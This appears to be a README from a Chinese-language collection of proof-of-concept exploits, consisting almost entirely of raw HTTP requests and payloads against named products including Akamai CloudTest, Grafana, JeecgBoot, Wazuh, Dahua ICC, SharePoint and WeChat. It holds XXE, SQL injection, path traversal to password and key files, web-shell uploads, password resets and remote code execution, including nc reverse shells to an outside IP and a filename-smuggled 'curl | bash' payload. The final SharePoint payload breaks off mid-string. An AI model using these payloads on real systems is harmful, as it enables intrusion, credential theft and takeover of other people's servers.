└── README.md


/README.md:
--------------------------------------------------------------------------------
   1 | ```javascript
   2 | 
   3 | 
   4 | NAME:\Akamai\Akamai CloudTest soap RepositoryService接口 XXE漏洞（CVE-2025-49493）.txt
   5 | POC:
   6 | POST //concerto/services/RepositoryService HTTP/1.1
   7 | Host: readacted.com
   8 | Cache-Control: max-age=0
   9 | Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
  10 | Sec-Ch-Ua-Mobile: ?0
  11 | Sec-Ch-Ua-Platform: "macOS"
  12 | Upgrade-Insecure-Requests: 1
  13 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
  14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  15 | Sec-Gpc: 1
  16 | Accept-Language: en-US,en;q=0.9
  17 | Sec-Fetch-Site: none
  18 | Sec-Fetch-Mode: navigate
  19 | Sec-Fetch-User: ?1
  20 | Sec-Fetch-Dest: document
  21 | Accept-Encoding: gzip, deflate, br
  22 | Priority: u=0, i
  23 | Connection: keep-alive
  24 | Content-Type: application/x-www-form-urlencoded
  25 | Content-Length: 610
  26 | 
  27 | <?xml version="1.0" encoding="UTF-8"?>
  28 | <!DOCTYPE soapenv:Envelope [
  29 |   <!ENTITY xxe SYSTEM "http://b6it5hei11vmt9as2lbg98h4gvmrahy6.oastify.com">
  30 | ]>
  31 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  32 |                   xmlns:rep="http://example.com/services/repository">
  33 |    <soapenv:Header/>
  34 |    <soapenv:Body>
  35 |       <rep:getUIBundleObjectXml>
  36 |          <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
  37 |       </rep:getUIBundleObjectXml>
  38 |    </soapenv:Body>
  39 | </soapenv:Envelope>
  40 | 
  41 | 
  42 | NAME:\AstrBot\AstrBot路径遍历20250728.txt
  43 | POC:
  44 | GET /api/chat/get_file?filename=../../../../../../../etc/passwd HTTP/1.1
  45 | Host: 
  46 | 
  47 | NAME:\Grafana\Grafana 跨站点脚本（XSS）CVE-2025-4123.txt
  48 | POC:
  49 | GET /public/..%2F%5cbaidu.com%2F%3f%2F..%2F.. HTTP/1.1
  50 | 
  51 | NAME:\JeecgBoot\Jeecg-boot SQL注入20250721.txt
  52 | POC:
  53 | GET /api/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1
  54 | 
  55 | NAME:\JeecgBoot\JeecgBoot getTotalData任意用户密码重置.txt
  56 | POC:
  57 | POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
  58 | Host: 
  59 | Content-Type: application/json
  60 | 
  61 | {"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "username,password,salt", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}
  62 | 
  63 | NAME:\JeecgBoot\JeecgBoot 框架passwordChange接口存在任意用户密码重置.txt
  64 | POC:
  65 | GET /novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1
  66 | 
  67 | NAME:\Letta\Letta平台(AI代理框架)远程代码执行CVE-2025-51482.txt
  68 | POC:
  69 | POST /v1/tools/run HTTP/1.1
  70 | Host: localhost:8283
  71 | Content-Type: application/json
  72 | Content-Length: 248
  73 | 
  74 | {
  75 |   "source_code": "def test():\n    \"\"\"Test rce.\"\"\"\n    import os\n    return os.popen('id').read()",
  76 |   "args": {},
  77 |   "env_vars": {
  78 |     "PYTHONPATH": "/usr/lib/python3/dist-packages"
  79 |   },
  80 |   "name": "test"
  81 | }
  82 | 
  83 | NAME:\Maildata\Maildata邮件网关 0day20250721.txt
  84 | POC:
  85 | 11111111111111111111111111`nc${IFS}-e${IFS}$(base64${IFS}-
  86 | d___L2Jpbi9iYXNo)${IFS}101.132.27.225${IFS}587`111.zip
  87 | 
  88 | NAME:\MailEnable\MailEnable 存在反射 XSS（CVE-2025-44148）.txt
  89 | POC:
  90 | GET /Mondo/lang/sys/Failure.aspx?state=19753%22;}alert(document.domain);function%20test(){%22 HTTP/1.1
  91 | 
  92 | NAME:\MobileOA\智能办公系统 MobileOA.asmx SQL注入.txt
  93 | POC:
  94 | POST /iOffice/prg/set/wss/MobileOA.asmx HTTP/1.1
  95 | Host: 
  96 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
  97 | Content-Type: text/xml; charset=utf-8
  98 | 
  99 | <?xml version="1.0" encoding="utf-8"?>
 100 | <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 101 |                xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 102 |                xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 103 |   <soap:Body>
 104 |     <GeMrNewData xmlns="http://tempuri.org/">
 105 |       <MobileOAEmailAddress>' AND 5079 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5079=5079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))-- eqJq</MobileOAEmailAddress>
 106 |     </GeMrNewData>
 107 |   </soap:Body>
 108 | </soap:Envelope>
 109 | 
 110 | NAME:\PWS\PWS Dashboard 存在任意文件读取漏洞.txt
 111 | POC:
 112 | GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
 113 | 
 114 | 
 115 | NAME:\Redhat\centos web panel远程代码执行 CVE-2025-48703.txt
 116 | POC:
 117 | POST /myuser/index.php?module=filemanager&acc=changePerm HTTP/1.1
 118 | Host:
 119 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
 120 | 
 121 | fileName=.bashrc&currentPath=/home/linux主机用户名&t_total=`nc xx.xx.xx.xx 18080 -e /bin/bash`
 122 | 
 123 | NAME:\Richmail\Richmail邮件openapiservice任意文件上传.txt
 124 | POC:
 125 | POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1
 126 | Host:
 127 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
 128 | 
 129 | ------WebKitFormBoundary
 130 | Content-Disposition: form-data; name="imageX"
 131 | 
 132 | 0
 133 | ------WebKitFormBoundary
 134 | Content-Disposition: form-data; name="imageY"
 135 | 
 136 | 0
 137 | ------WebKitFormBoundary
 138 | Content-Disposition: form-data; name="submit"
 139 | 
 140 | 提交
 141 | ------WebKitFormBoundary
 142 | Content-Disposition: form-data; name="filename"; filename="../../../../../web/webmailsvr/admin/12.jsp"
 143 | Content-Type: text/plain
 144 | 
 145 | <% out.println("Vulnerable!"); %>
 146 | ------WebKitFormBoundary--
 147 | 
 148 | NAME:\Unibox\Unibox路由器download_csv.php任意文件读取.txt
 149 | POC:
 150 |  GET /tools/download_csv.php?download_file=../../../etc/passwd HTTP/1.1
 151 | 
 152 | NAME:\Unibox\Unibox路由器update_byod.php SQL注入.txt
 153 | POC:
 154 | POST /authentication/update_byod.php HTTP/1.1
 155 | Host: 
 156 | Content-Type: application/x-www-form-urlencoded
 157 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
 158 | Accept-Encoding: gzip, deflate
 159 | Connection: close
 160 | 
 161 | update=1&macAddress=1' AND (SELECT 2222 FROM (SELECT(SLEEP(5)))ogZo) AND 'NXsn'='NXsn&oldMacAddress=
 162 | 
 163 | NAME:\Wazuh\Wazuh服务器远程代码执行漏洞（CVE-2025-24016）.txt
 164 | POC:
 165 | POST /security/user/authenticate/run_as HTTP/1.1
 166 | Host: 
 167 | Content-Type: application/json
 168 | Authorization: Basic <base64(username:password)>
 169 | Content-Length: 6667
 170 | 
 171 | {
 172 |     "__unhandled_exc__":{
 173 |         "__class__": "NotARealClass", "__args__": []
 174 |     }
 175 | }
 176 | 
 177 | NAME:\WebOne\WebOne 劳动力与考勤管理套件 DownloadFile.aspx 任意文件读取.txt
 178 | POC:
 179 | GET /webForms/Download/DownloadFile.aspx?fileid=/../../web.config&flag=report HTTP/1.1
 180 | 
 181 | NAME:\WPS\WPS未授权访问导致RCE.txt
 182 | POC:
 183 | 1.未授权访问
 184 | GET /open/v6/api/etcd/operate?key=/config/storage&method=get HTTP/1.1
 185 | 2.获取AKSK后使用脚本添加kubelet 路由映射（需获取TOKEN）
 186 | 3.向对应POD发起通信后实现RCE
 187 | GET /open/wps/run/{namespace}/{podname}/node-exporter?cmd={url_encode_command}  HTTP/1.1
 188 | 
 189 | NAME:\东胜物流\东胜物流 CommMngPrintUploadMailFile 任意文件上传.txt
 190 | POC:
 191 | 
 192 | POST /CommMng/Print/UploadMailFile HTTP/1.1
 193 | Host: 
 194 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
 195 | Content-Length: 234
 196 | 
 197 | 
 198 | ------WebKitFormBoundary7MA4YWxkTrZu0gW
 199 | Content-Disposition: form-data; name="LoadFile"; filename="1.ashx"
 200 | Content-Type: application/octet-stream
 201 | 
 202 | 12312
 203 | 
 204 | ------WebKitFormBoundary7MA4YWxkTrZu0gW--
 205 | 
 206 | NAME:\东胜物流\东胜物流 GetBANKList SQL注入.txt
 207 | POC:
 208 | POST /MvcShipping/MsBaseInfo/GetBANKList HTTP/1.1
 209 | Host: 
 210 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 211 | Accept-Encoding: gzip
 212 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 213 | Content-Length: 456
 214 | 
 215 | strCondition=1'
 216 | 
 217 | NAME:\东胜物流\东胜物流 GetDataList_Salary SQL注入.txt
 218 | POC:
 219 | POST /TruckMng/MsWlDriver/GetDataList_Salary?_dc=1665626804091&start=0&limit=30&sort=&condition=1*&page=1 HTTP/1.1
 220 | Host: 
 221 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 222 | Accept-Encoding: gzip
 223 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 224 | Content-Length: 448
 225 | 
 226 | strCwSTARTGID=1'
 227 | 
 228 | NAME:\东胜物流\东胜物流 SoftMng FileInputHandler Upload 任意文件上传.txt
 229 | POC:
 230 | POST /SoftMng/FileInputHandler/Upload HTTP/1.1
 231 | Host: 
 232 | Accept: */*
 233 | Accept-Encoding: gzip, deflate
 234 | Connection: keep-alive
 235 | Content-Length: 211
 236 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
 237 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
 238 | 
 239 | ------WebKitFormBoundaryFfJZ4PlAZBixjELj
 240 | Content-Disposition: form-data; name="file"; filename="QAZWSX.aspx"
 241 | Content-Type: application/octet-stream
 242 | 
 243 | 123456
 244 | ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
 245 | 
 246 | 
 247 | 
 248 | NAME:\东胜物流\东胜物流软件 WmsZXFeeGridSource.aspx SQL注入.txt
 249 | POC:
 250 | GET /WMS_ZX/WmsZXFeeGridSource.aspx?areaname=%20%20%20%20%5c%75%30%30%33%31%5c%75%30%30%32%37%5c%75%30%30%36%31%5c%75%30%30%36%65%5c%75%30%30%36%34%5c%75%30%30%32%30%5c%75%30%30%33%31%5c%75%30%30%33%63%5c%75%30%30%34%30%5c%75%30%30%34%30%5c%75%30%30%35%36%5c%75%30%30%34%35%5c%75%30%30%35%32%5c%75%30%30%35%33%5c%75%30%30%34%39%5c%75%30%30%34%66%5c%75%30%30%34%65%5c%75%30%30%32%64%5c%75%30%30%32%64%20%20%20%20&read=%20%20%20%20areaname%20%20%20%20 HTTP/1.1
 251 | 
 252 | NAME:\东胜物流\东胜物流软件WorkFlowGridSource.aspx SQL注入.txt
 253 | POC:
 254 | 
 255 | 
 256 | NAME:\亿赛通\亿赛通 HookWhiteListservice SQL 注入.txt
 257 | POC:
 258 | GET /CDGServer3/policy/HookWhiteList;logindojojs?command=AddHookWhiteList&policyId=1';if(db_name()='CobraDGServer')+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
 259 | 
 260 | NAME:\亿赛通\亿赛通 WorkFlowAction SQL 注入.txt
 261 | POC:
 262 | POST /CDGServer3/3g/WorkFlowAction;Servicelogin HTTP/1.1
 263 | Host:
 264 | Connection: close
 265 | Content-Type: application/x-www-form-urlencoded
 266 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
 267 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 268 | Accept-Language: zh-CN,zh;q=0.9
 269 | 
 270 | command=Approval&userId=1&fromurl=getTodoList.jsp?curpage=111&flowId=111'%3bWAITFOR+DELAY+'0%3a0%3a4'-
 271 | 
 272 | NAME:\亿邮\亿邮邮件网关 RCE.txt
 273 | POC:
 274 | #!/bin/bash
 275 | PAYLOAD_NAME="testpoc.pdf\`{echo Y3VybCBodHRwOi8vc2R5eWE0Mm4uZG5zLmFkeXNlYy5jb20K}|{base64 -d}|bash\`"
 276 | WORKDIR=$(mktemp -d)
 277 | cd "$WORKDIR" || exit 1
 278 | echo -n "12345" > "$PAYLOAD_NAME"
 279 | OUTPUT_RAR="payload_testpoc.rar"
 280 | rar a -ma5 -m0 -ep "$OUTPUT_RAR" "$PAYLOAD_NAME"
 281 | mv "$OUTPUT_RAR" "$OLDPWD"
 282 | echo "[+] Done: $OUTPUT_RAR created."
 283 | rm -rf "$WORKDIR"
 284 | 
 285 | NAME:\信呼\信呼OA uploawAction.php 接口存在SQL注入.txt
 286 | POC:
 287 | POST /index.php?a=upfile&n=uploaw|api&d=task HTTP/1.1
 288 | Host:
 289 | X-Requested-With:XMLHttpRequest
 290 | Content-Type:multipart/form-data;boundary=----WebKitFormBundaryitXXXXXXXX
 291 | 
 292 | ------WebKitFormBundaryitXXXXXXXX
 293 | Content-Dispostion:form-data;name="file";filename="a',web=(select if(123=123,sleep(5),0))--,png"
 294 | test
 295 | ------WebKitFormBundaryitXXXXXXXX
 296 | 
 297 | NAME:\华天动力\华天动力oa8000 downloadfortrace.jsp存在任意文件读取.txt
 298 | POC:
 299 | GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini  HTTP/1.1
 300 | 
 301 | NAME:\华天动力\华天软件-BaseHandler.ashx前台文件上传.txt
 302 | POC:
 303 | POST /Base/BaseHandler.ashx?type=uploadFileBase64&fileSupport=ashx HTTP/1.1
 304 | Host:
 305 | 
 306 | <%%>
 307 | 
 308 | NAME:\华天动力\华天软件inforcenter PLM前台文件上传.txt
 309 | POC:
 310 | /Base/BaseHandler.ashx?type=uploadFileToIIS&uploadPath=../Files/
 311 | 
 312 | NAME:\唯德\唯徳知识产权管理系统Case.ashx任意文件读取.txt
 313 | POC:
 314 | GET /wxInterface/Case.ashx/WSDownloadPDF?file_type=1&app_no=../../&file=web.config HTTP/1.1
 315 | 
 316 | NAME:\大华\大华icc evo-runsv1.0 push RCE.txt
 317 | POC:
 318 | POST /evo-runs/v1.0/push HTTP/2
 319 | Host: 
 320 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
 321 | Content-Type: application/json
 322 | X-Subject-Headerflag: ADAPT
 323 | Content-Length: 301
 324 | 
 325 | {   
 326 |  "method": "agent.ossm.mapping.config",
 327 |     "info": {
 328 |         "configure": "cc", 
 329 |         "filePath": "cc",
 330 |         "paramMap": {
 331 |             "shellPath": "/bin/bash -c id>/opt/evoWpms/static/cc.txt",
 332 |             "filePath": "cc"
 333 |         },
 334 |         "requestIp": ""
 335 |     }
 336 | }
 337 | 
 338 | 
 339 | NAME:\大华\大华icc evo-runsv1.0 receive RCE.txt
 340 | POC:
 341 | POST /evo-runs/v1.0/receive HTTP/1.1
 342 | Host: 
 343 | Accept-Encoding: gzip
 344 | Connection: keep-alive
 345 | Content-Length: 249
 346 | Content-Type: application/json
 347 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
 348 | X-Subject-Headerflag: ADAPT
 349 | 
 350 | {
 351 |   "method": "agent.ossm.mapping.config",
 352 |   "info": {
 353 |     "configure": "abcd",
 354 |     "filePath": "haha",
 355 |     "paramMap": {
 356 |       "shellPath": "/bin/bash -c df>/opt/evoWpms/static/macvguun.txt",
 357 |       "filePath": "abc"
 358 |     },
 359 |     "requestIp": ""
 360 |   }
 361 | }
 362 | 
 363 | NAME:\天锐\天锐绿盾审批系统 sysadmin 信息泄露.txt
 364 | POC:
 365 | GET /trwfe/service/../ws/identity/user/sysadmin HTTP/1.1
 366 | 
 367 | NAME:\孚盟云\孚盟云 GetIcon.aspx SQL 注入.txt
 368 | POC:
 369 | GET /Common/GetIcon.aspx?FUID=-1'and+1=@@VERSION-- HTTP/1.1
 370 | 
 371 | NAME:\孚盟云\孚盟云CRM LicMould.ashx SQL注入.txt
 372 | POC:
 373 | POST /Ajax/LicMould.ashx HTTP/1.1
 374 | Host: 
 375 | Content-Type: application/x-www-form-urlencoded
 376 | Content-Length: 123
 377 | 
 378 | action=DeleteEmp&key=1%20WAITFOR%20DELAY%20’0:0:4′–&fuids=abc,def,
 379 | 
 380 | NAME:\安科瑞\安科瑞智能环保云平台getmonitorrealdata SQL注入.txt
 381 | POC:
 382 | POST /Swicth/getmonitorrealdata HTTP/1.1
 383 | Host: 
 384 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 385 | Accept-Encoding: gzip, deflate
 386 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 387 | Connection: keep-alive
 388 | Content-Length: 259
 389 | Content-Type: application/x-www-form-urlencoded
 390 | Cookie: ASP.NET_SessionId=tpxci2nbjxx10ydcjnbyku5m
 391 | Priority: u=0, i
 392 | Upgrade-Insecure-Requests: 1
 393 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
 394 | 
 395 | {
 396 |  "dnjcsStartTime": "2025-06-30 09:27:00",
 397 |  "dnjcEndTime": "2025-06-30 23:59:59",
 398 |  "swicthId": "-7756' OR 1 GROUP BY CONCAT(0x716a787671,(SELECT (CASE WHEN (1241=1241) THEN 1 ELSE 0 END)),0x716a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#",
 399 |  "meterId": "1"
 400 | }
 401 | 
 402 | NAME:\帆软\帆软报表fr_remote_design文件上传.txt
 403 | POC:
 404 | GET /WebReport/ReportServer?op=fr_remote_design&cmd=design_install_reufile&reuFileName=vulntest.reu&isComplete=false HTTP/1.1
 405 | 
 406 | NAME:\微信\微信3.9 1click RCE.txt
 407 | POC:
 408 | <recordinfo><title>聊天加记录</title><desc>.:[文件]test.txt.:[文件]calc.bat-快捷方式.lnk</desc><datalist count="2"><dataitem dataid = "2bfdb5aaaa9552c4baa0dbc38f26c756" datatype="8" datasourceid="2"><messageuuid>0</messageuuid><cdndataurl>333333333333</cdndataurl><cdnencryver>1</cdnencryver>/../../../../../../../../../../../test/calc.bat
 409 | 
 410 | 
 411 | <dataitem dataid = "2bfdb5aaaa9552c4baa0dbc38f26c756" datatype="8" datasourceid="2"><messageuuid>0</messageuuid><cdndataurl>333333333333</cdndataurl><cdnencryver>1</cdnencryver>/../../../../../../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/a.lnk
 412 | 
 413 | NAME:\微信\微信发送a链接href可控.txt
 414 | POC:
 415 | <a
 416 | href="weixin://bizmsgmenu
 417 | ?msgmenucontent=
 418 | &msgmenuid=960">https://chinamobile.com/shell.jsp</a >
 419 | 
 420 | <a href="weixin://jump/voipdetail/?data=1">点击起飞</a>
 421 | <a href="weixin://voip/callagain/?username=ponyma">点我和马化腾打电话</a>
 422 | <a href="weixin://findfriend/verifycontact/">我加我自己</a >
 423 | 
 424 | NAME:\微软\Microsoft SharePoint Server远程代码执行漏洞 CVE-2025-53770.txt
 425 | POC:
 426 | POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
 427 | Host: x.x.x.x
 428 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
 429 | Content-Length: 7699
 430 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 431 | Accept-Encoding: gzip, deflate, br
 432 | Connection: keep-alive
 433 | Content-Type: application/x-www-form-urlencoded
 434 | Referer: /_layouts/SignOut.aspx
 435 | Connection: close
 436 | 
 437 | MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQHUGQLIi0CAkgUSAw4YjBzeIFANm8i3%2Bz37MftXsyCyRlW7Zlz07PrhymKBaqMvPkyVNZAH%2F6%2Baeffvpv%2FNBv%2Bvm3f8KL1XtYLNP8rBkuwxcnMp0vRtPizcWZRv9enDRW2XI1T98U6Wo5D7MXJ3erKBvF79KH%2FnSSFm%2BiX34Ja3HtlX5ZvUi1Xy%2F%2FlRb%2Fj0dr8ksvXZKtPw7yrBcP0zz8M941Rx8%2BmPMw%2F%2FlnGvvDP%2BPlP%2F90tV28XvAlJ9s8KxZvTk%2FVm9dbvB8ul7PX5%2BebzeZsUz2bzu%2FPK5qmnw%2B6N2rZ%2FbX5IoHVN6ereVGutniZj%2BL5dDH9sHwZT%2FPXuO6luur0ZJS8OV1M85T%2BWqTL07f%2F%2FqeTT37IrTRL87RYnhRhnn484USt9Lq9KIN9c7qcr9LD5%2B4ibazmc0y%2BmcZhlpbDT9jZ24KLsyzd9h9m6ReuOlw5nI7i9CQfFbdxvJoDJA12w%2B3%2Br1URTVdFkiZfMvflEIfp8ItO%2FpjDn85apL%2Bt0iJ%2B7pSn3ZxtigPShD%2F58Oa0pGBjmmVpvASnF2dmWqTzUXx2M1os%2F6r%2F5S%2BPWdpL52vguDhrF8t0XoTZWWs7Cwk3bx7OZun8r5XDBC%2BNztz22c10IabzPFxiwouT49iPVJFW%2FVD78MsHXU9qWlgN37842BoVyXSzUE7eRmPEQm%2Fv5tP1KCG7d%2FN0ASxCClGgmtLNdD75AReqevSh%2BmvtVZhUX12k1dr794eYPgLof0Ej3r8%2FPVlykpDLsHighJ1%2BzODz55Lo%2FPtYxNc%2Fn6t8ecm2r9Xh%2BaEQv1TT37b7FVsqStaxt3%2F4F%2Bjkf5lXCdTzfv5a%2FQrzHxI%2BNUct8a05e0Mv1%2FqTAvlID7%2BEAenJSek3aW4%2FjLKjSM6nm9s5KM0CVl41DBeNYVjcpyDFqFik8%2BXXdewKWnDYLkbf3i9eYtFlCOocN5nkGbvMt1jziXTcfngsFZ8X8e%2Fg8clzamPvdkuR8Dk1eIUYKJw0wRuEunzQnlu53XQ5nCYWFOttExI2H4XZaJdenT%2F6%2FLtWugtJ%2FQDw4nt2k1J%2Bfo8UYPHXe9lLXi%2BW81Fxf%2Fr2fNN62DS0et2u1%2Bt35%2Fj51agffjYNeu1JqxZXnSzqbe5lLh%2FiSraOxpp2M66vuo2LzU3DaCbeVksGnezOq2XJwHnwvc2iLQzdz7czX1tmqXTWYUWu7rx21aq0dH%2FnVrr9yc4y3c1tcyLYfts23Gq2S0y5vJlY68jcZn7VmUWV2u5mkmQRbIded%2BVWLh9wzcStSM1visjT9%2F7V%2Bsl1Zxbl8aJt6jsf10VmNoJ%2FXjDo7ELvcnXXt5XP4%2Fqi3bL06NrR49y9xNo65g6jxubevZYjzBv3KrImzct54F1c%2BuO46vfl2Or729t%2BVwv69YtbTFFgyWZUlaukPmxGFX3jA4f4PjnYNNxMCzx9V69368b9yKof8Kzh%2Bu0i8CyNrosfatcB8IvzbMzxD4wh3u8Q%2F3HdvL719GU%2FHVhYU1u5VQeY1ArEuIwr1jomvEd%2Frzxhin3PnKjf08uk%2Beh9i14NxFivN%2F6fx8ih3Awqj%2F27aLazQ0ytwNtmQUVogbQoliH48sofMFfbiHcSDNodgzhttFpHjHyTXofDzdp%2FMDZRNcniwppirUW7oYsot9YBeG1XLpeRJ1ZBw3hnu52Z7SbC9qyqnW8NR2RGfyIasiXarivGgdbZ2G6s2XJWtb3EcJqG0XOFEbrCtF3hJFpnYLtS2NJy7ElgONXECFqiEU6E8DVx57ptHes7thRVe2IZTn9oSF00vJZoOa4Ywf5vtutYGC%2Fs%2FNJw8qXR95KGnIhWqIm%2B63Z2tutqtltz7HxmOC3dkBiPNXENP2SitbawL22ZOXY2NByZGX6eNODfdbfF9ivKfqdqF7BfuTS8QdKwXCGwfgj%2Fb2w3cLC%2BYU9g39UNH%2Bt3sX6iCQn7LazfQXzwL4N%2FieHS%2BERc9%2BE%2F8Olh%2FbEtA8MuHLZP8fvAJ9CEG2ht%2BB%2FMMV7l9YGPdBlfEWnCQ%2FwLjBe2dAp7AHyBgSwSA7bbkuPr4BqMeQL4ztg%2FmQkjBr7ID%2FlX4XGZVe0B%2FOs7RiCBf4vtO%2Fhfhf%2BwbyG%2BJfCThgf%2FE9j3XGHBPmIPLI5vHCj7mmj0NNECvgPEF%2FD8vX3PMgL4Hyn8R7A%2Fh33kP1H468LwwR%2F4ZgKfPuZv1Xyp5lcsQ0pB8VF%2Be5jfh%2F2A80%2F8mIB%2FhM8x%2F1vGz9UxvwZ8hQG6NawW528YaK0N84P4VRjAB%2FEVSaMHfLCOo%2FCn%2FBP%2BS6MH%2FniS%2BSfAD8o%2F1o6xxqVjFwp%2FF%2FywNWGCnwPY93m%2Bh3LLgG8r4%2FiRfxP2vYTzH18Av6qddTAO%2F6pH%2B5i%2FOuBfzDg%2FtH4E%2FoDDhI%2ByLzvAXwLfpeEC%2Fz7wQf4pfgF8Da6%2FLGD%2BE74W5gPjnqq%2FIeLDNcRv75LHfcX%2FzOb6Yfww30L8gvJvpK5oYf4E6%2FcO%2FNvnHzikLXGN%2BAL410H8O9tzkF%2FJ%2Be%2FrnH8T%2F6n%2BEV9C%2FHbswUzVP%2FiFuVT%2FHvAHtrLK%2BKG2mf%2BYH0NffFV%2FAxV%2FoOLXdK5%2FYNMGPwPFH8QG3tsTneuX8t91OX%2BwT%2Fkfjjn%2BCerPzQwX8cO%2BifURP%2FGf8p8o%2Fpf1R%2Fojlf7MVfxS2YePiJ%2Fqv91X%2BF9z%2FRP%2FMsS3Mzj%2F4C%2FlH%2FVD8SVV5AfjCfM3MBOqP6ofip%2F4ayj%2BzYyeCf4LQfjzfKw%2FxPw15iv96BsGuN9wNOYH9KMj2b4nDOY%2F%2BOdmjJ%2BIlX68%2Bhr%2Fj%2Fwj%2Fe1w%2FXlYv6z%2FDOPYA%2BSY4ysyrl%2Fm%2F7H%2BOgf9Jfyraj7pL%2FEP%2FqF%2BHcn6M0H9gyO%2Bsk%2F6Cf9JnxNrzz%2FCn%2FRHKvyRe4o%2FGPP%2BMRbAT1L%2BDegz6R%2Fpj8b4eqgP4g%2FpbyVh%2FSn5D34PoR9ZwfELaUjgDx8p%2F4Rfhfc3wr8vVP4HzH8T8d8iPtLXDvOvECr%2B4iP%2BbZR%2BoX4zg%2FNH%2BtRX%2BkP8byj9p%2F3PeUJ%2FRE3pP%2FGv1L8K2yf8oV%2BMv8P8zpFfLVP8Az7grgt8Hg76Q%2FFL4COP%2BMP%2BWsWfFGwf6%2FsYd7U9%2F4j%2FgVD2Lfaf8IcOUH7IfnjgP%2Bkf7BP%2BVF8ux0%2F%2BI78e9okc%2Bc0t3j%2BJf4mKv8n7J%2FNf7T%2BED%2B1%2FvqoP4r%2BaT%2FWB%2Bintm2X8c%2BYfxTfusH34z%2FaxTqD0l%2BwjjtJ%2BH%2FxPsL